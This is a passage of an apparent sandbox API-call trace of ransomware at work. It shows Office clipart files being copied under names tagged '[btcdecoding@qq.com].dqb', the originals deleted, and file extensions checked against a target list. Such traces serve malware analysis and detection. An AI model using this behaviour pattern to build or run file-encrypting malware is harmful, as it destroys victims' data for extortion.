office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.399] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.399] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.399] GetLastError () returned 0x0 [0053.399] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x9bc, lpOverlapped=0x0) returned 1 [0053.401] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0053.402] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.402] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.402] SetEndOfFile (hFile=0x218) returned 1 [0053.403] CloseHandle (hObject=0x218) returned 1 [0053.403] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.403] SetEndOfFile (hFile=0x17c) returned 1 [0053.403] CloseHandle (hObject=0x17c) returned 1 [0053.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.404] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 1 [0053.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.404] lstrlenW (lpString=".doc") returned 4 [0053.404] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.404] lstrlenW (lpString=".docx") returned 5 [0053.404] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.404] lstrlenW (lpString=".pdf") returned 4 [0053.404] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.404] lstrlenW (lpString=".xls") returned 4 [0053.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.404] lstrlenW (lpString=".xlsx") returned 5 [0053.404] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.404] lstrlenW (lpString=".ppt") returned 4 [0053.404] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.404] lstrlenW (lpString=".zip") returned 4 [0053.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.404] lstrlenW (lpString=".rar") returned 4 [0053.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.404] lstrlenW (lpString=".bz2") returned 4 [0053.405] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.405] lstrlenW (lpString=".7z") returned 3 [0053.405] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.405] lstrlenW (lpString=".dbf") returned 4 [0053.405] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.405] lstrlenW (lpString=".1cd") returned 4 [0053.405] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.405] lstrlenW (lpString=".jpg") returned 4 [0053.405] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.405] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.405] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.406] GetLastError () returned 0x0 [0053.406] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x6906, lpOverlapped=0x0) returned 1 [0053.407] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x6910, lpOverlapped=0x0) returned 1 [0053.409] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.409] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.409] SetEndOfFile (hFile=0x218) returned 1 [0053.409] CloseHandle (hObject=0x218) returned 1 [0053.409] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.409] SetEndOfFile (hFile=0x17c) returned 1 [0053.410] CloseHandle (hObject=0x17c) returned 1 [0053.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf")) returned 1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.411] lstrlenW (lpString=".doc") returned 4 [0053.411] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".docx") returned 5 [0053.411] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.411] lstrlenW (lpString=".pdf") returned 4 [0053.411] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".xls") returned 4 [0053.411] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.411] lstrlenW (lpString=".xlsx") returned 5 [0053.411] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.411] lstrlenW (lpString=".ppt") returned 4 [0053.411] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.411] lstrlenW (lpString=".zip") returned 4 [0053.411] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.411] lstrlenW (lpString=".rar") returned 4 [0053.411] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".bz2") returned 4 [0053.411] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".7z") returned 3 [0053.411] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.411] lstrlenW (lpString=".dbf") returned 4 [0053.411] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.411] lstrlenW (lpString=".1cd") returned 4 [0053.411] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.411] lstrlenW (lpString=".jpg") returned 4 [0053.411] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.412] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.412] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.412] GetLastError () returned 0x0 [0053.412] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7114, lpOverlapped=0x0) returned 1 [0053.414] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7120, lpOverlapped=0x0) returned 1 [0053.415] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.415] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.416] SetEndOfFile (hFile=0x218) returned 1 [0053.416] CloseHandle (hObject=0x218) returned 1 [0053.416] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.416] SetEndOfFile (hFile=0x17c) returned 1 [0053.417] CloseHandle (hObject=0x17c) returned 1 [0053.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf")) returned 1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.418] lstrlenW (lpString=".doc") returned 4 [0053.418] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString=".docx") returned 5 [0053.418] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.418] lstrlenW (lpString=".pdf") returned 4 [0053.418] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString=".xls") returned 4 [0053.418] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.418] lstrlenW (lpString=".xlsx") returned 5 [0053.418] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.418] lstrlenW (lpString=".ppt") returned 4 [0053.418] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.418] lstrlenW (lpString=".zip") returned 4 [0053.418] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.418] lstrlenW (lpString=".rar") returned 4 [0053.418] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString=".bz2") returned 4 [0053.418] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString=".7z") returned 3 [0053.418] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.418] lstrlenW (lpString=".dbf") returned 4 [0053.418] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.418] lstrlenW (lpString=".1cd") returned 4 [0053.418] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.418] lstrlenW (lpString=".jpg") returned 4 [0053.418] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.419] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.419] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.420] GetLastError () returned 0x0 [0053.420] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x2d74, lpOverlapped=0x0) returned 1 [0053.498] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x2d80, lpOverlapped=0x0) returned 1 [0053.499] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.499] WriteFile (in: hFile=0x218, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.499] SetEndOfFile (hFile=0x218) returned 1 [0053.499] CloseHandle (hObject=0x218) returned 1 [0053.499] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.499] SetEndOfFile (hFile=0x17c) returned 1 [0053.500] CloseHandle (hObject=0x17c) returned 1 [0053.500] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.501] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf")) returned 1 [0053.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.501] lstrlenW (lpString=".doc") returned 4 [0053.501] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.501] lstrlenW (lpString=".docx") returned 5 [0053.501] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.501] lstrlenW (lpString=".pdf") returned 4 [0053.501] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.501] lstrlenW (lpString=".xls") returned 4 [0053.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.501] lstrlenW (lpString=".xlsx") returned 5 [0053.501] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.501] lstrlenW (lpString=".ppt") returned 4 [0053.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.501] lstrlenW (lpString=".zip") returned 4 [0053.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.502] lstrlenW (lpString=".rar") returned 4 [0053.502] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.502] lstrlenW (lpString=".bz2") returned 4 [0053.502] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.502] lstrlenW (lpString=".7z") returned 3 [0053.502] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.502] lstrlenW (lpString=".dbf") returned 4 [0053.502] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.502] lstrlenW (lpString=".1cd") returned 4 [0053.502] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.502] lstrlenW (lpString=".jpg") returned 4 [0053.502] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.503] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.503] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.503] GetLastError () returned 0x0 [0053.503] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x57f4, lpOverlapped=0x0) returned 1 [0053.505] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5800, lpOverlapped=0x0) returned 1 [0053.506] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.506] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.506] SetEndOfFile (hFile=0x234) returned 1 [0053.506] CloseHandle (hObject=0x234) returned 1 [0053.506] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.507] SetEndOfFile (hFile=0x218) returned 1 [0053.507] CloseHandle (hObject=0x218) returned 1 [0053.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.508] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 1 [0053.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0053.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0053.508] lstrlenW (lpString=".doc") returned 4 [0053.508] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.508] lstrlenW (lpString=".docx") returned 5 [0053.508] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.508] lstrlenW (lpString=".pdf") returned 4 [0053.508] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.508] lstrlenW (lpString=".xls") returned 4 [0053.508] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.508] lstrlenW (lpString=".xlsx") returned 5 [0053.508] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.508] lstrlenW (lpString=".ppt") returned 4 [0053.508] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0053.508] lstrlenW (lpString=".zip") returned 4 [0053.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.508] lstrlenW (lpString=".rar") returned 4 [0053.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.508] lstrlenW (lpString=".bz2") returned 4 [0053.508] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.508] lstrlenW (lpString=".7z") returned 3 [0053.509] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0053.509] lstrlenW (lpString=".dbf") returned 4 [0053.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0053.509] lstrlenW (lpString=".1cd") returned 4 [0053.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0053.509] lstrlenW (lpString=".jpg") returned 4 [0053.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.509] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=16180) returned 1 [0053.509] CloseHandle (hObject=0x218) returned 1 [0053.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 0x20 [0053.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.509] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.509] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.510] GetLastError () returned 0x0 [0053.510] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, 